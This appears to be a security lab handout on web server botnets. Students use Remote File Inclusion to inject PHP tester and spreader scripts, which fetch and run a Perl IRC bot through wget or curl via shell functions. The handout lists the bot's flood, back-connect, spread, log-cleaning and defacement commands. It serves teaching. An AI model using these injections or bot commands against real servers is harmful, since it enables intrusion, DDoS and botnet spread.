Web Server Botnets Background:

Web servers provide the basis for the Internet today. From a web page, users can get information on products, local and world-wide news, email and message boards, even chat functionality. They are dependable systems that are always on, connected onto high traffic lines designed to accommodate millions of users. Businesses can spend much more on a web server than many desktop machines.

Web servers are priority targets for hackers. A web server can provide the resources of several, if not hundreds, of individual desktop machines. Armies of high-bandwidth web servers have the capacity to large attacks using fewer systems. As well, they provide a means to continue other abuse by sending spam, hosting phishing websites, and opening up networks for further hacking. Today’s web servers are widely implemented using the open-source LAMP platform

(Linux/Apache/MySQL/PHP). The main alternative is using Windows products including

Windows Server, IIS, MSSQL, and ASP. These technologies are wide-spread and easy to deploy and use.

The most common entry points are web scripts – there are many scripts using PHP, CGI, ASP, JSP. Many are open-source, given popularity to freely use and customize to the users needs. The wide variety of vulnerabilities allows hackers numerous entry points. One server can host hundreds (or more) of these scripts… but all it takes is one to allow a successful compromise. The easiest, most common vulnerability is the Remote File Injection (RFI). It allows quick execution of code from the web browser and automated scripts. This allows “script kiddies” easy access to compromise your site.

A profitable injection will connect the compromised server to a botnet for easy control, to sell the usage off to another party for spamming, DDOS, etc. IRC botnet scripts are well-known and frequently used. Often an innocent IRC server is used to run such a botnet – little IRC

communications in a hidden channel aren’t usually something that administrators would notice. Another part of the successful injections are search engines. If a web site is out there, Google can be used to find and exploit them. Such “Google dorks” search parameters allows hackers to quickly find exploitable web sites.

Resources:

Evron, Gadi. “Web Server Botnets and Server Farms as Attack Platforms.” February edition of the Virus Bulletin magazine, available from

http://www.circleid.com/posts/web_server_botnets_farms_attack/, 2007.

Lab Instructions:

Before you start, edit the web server address in the file /apache2/htdocs/botflies/well.txt– change this to the ip of your host machine.

$servidor=’57.35.6.86’ unless $servidor;

If you haven’t yet, start IRCd on your WS 4.0.

/usr/local/sbin/ircd -s

Go to http://localhost/botfiles/ver3.txt and you should see some PHP code like below

This is our tester (echo) script. It allows our bot to determine whether the injection was successful to allow further compromises. Files can be any text file… often named as images (.jpg, .gif, etc) to hide them. They must be web-accessible, usually on someone else’s host that has been compromised or on a free web-hosting service.

Load up our remote file injection by doing the following

http://(ipaddress)/rfi/index.php?path=http://localhost/botfiles/ ver3.txt?

Notice while we are using one server:

We are using (ipaddress) as the host being attacked

localhost as a file server hosting files And also (ipaddress) as an IRC server

These can all be different and any of them may not be where the hacker really is.

Notice all the information we obtained. Our keyword here is ‘Mic22’ – which is echo’d back to the client so we know the site is vulnerable.

SCREENSHOT:Take a screenshot of a successful Remote File Injection of our tester script.

Spreader / Beachhead script

Let’s take a look at the second script this uses.

http://localhost/botfiles/select.txt

This script attempts to download and execute some code from our file base –

http://localhost/botfiles/well.txt - If you notice, it attempts all the PHP execution commands to execute things on the shell.

Many of these functions could be disabled. So our hacker tries them all exec() passthru() system() shell_exec()

Next we try and download our file using a number of command line functions

wget curl get fetch

Once this perl script is downloaded, it is executed and deleted. Try our injection now:

http://(ipaddress)/rfi/index.php?path=http://localhost/botfiles/ select.txt?

You’ll notice our browser window doesn’t actually respond. Firefox will keep waiting for data that is never sent. Our script here doesn’t actually return any response.

The Compromise

We don’t get any browser output, but check our IRC channel. We have a new bot connected named Just.

Just like any other bot net, we can send commands to it to do all kinds of things

Check out the code in http://localhost/botfiles/well.txt

#You can use the following commands : #!sh @portscan <ip>

#!sh @nmap <ip> <beginport> <endport> #!sh @back <ip><port>

#!sh @udpflood <ip> <packet size> <time> #!sh @tcpflood <ip> <port> <packet size> <time> #!sh @httpflood <site> <time>

#!sh @linuxhelp

#!sh @rfi <vuln> <dork> #!sh @system

#!sh @milw0rm #!sh @logcleaner #!sh @deface

#!sh @spread <rfi = for example www.mywebsite.com/index.php?= > #!sh @sendmail <subject> <sender> <recipient> <message>

Interesting commands include

#!sh @spread localhost/botflies/ver3.txt

Let’s set which file we’re using to spread our bot net

#!sh @rfi <vuln> <dork>

Search for exploits using <dork> in search engines: Google, Yahoo, MSN, AllTheWeb and execute vulnerability <vuln>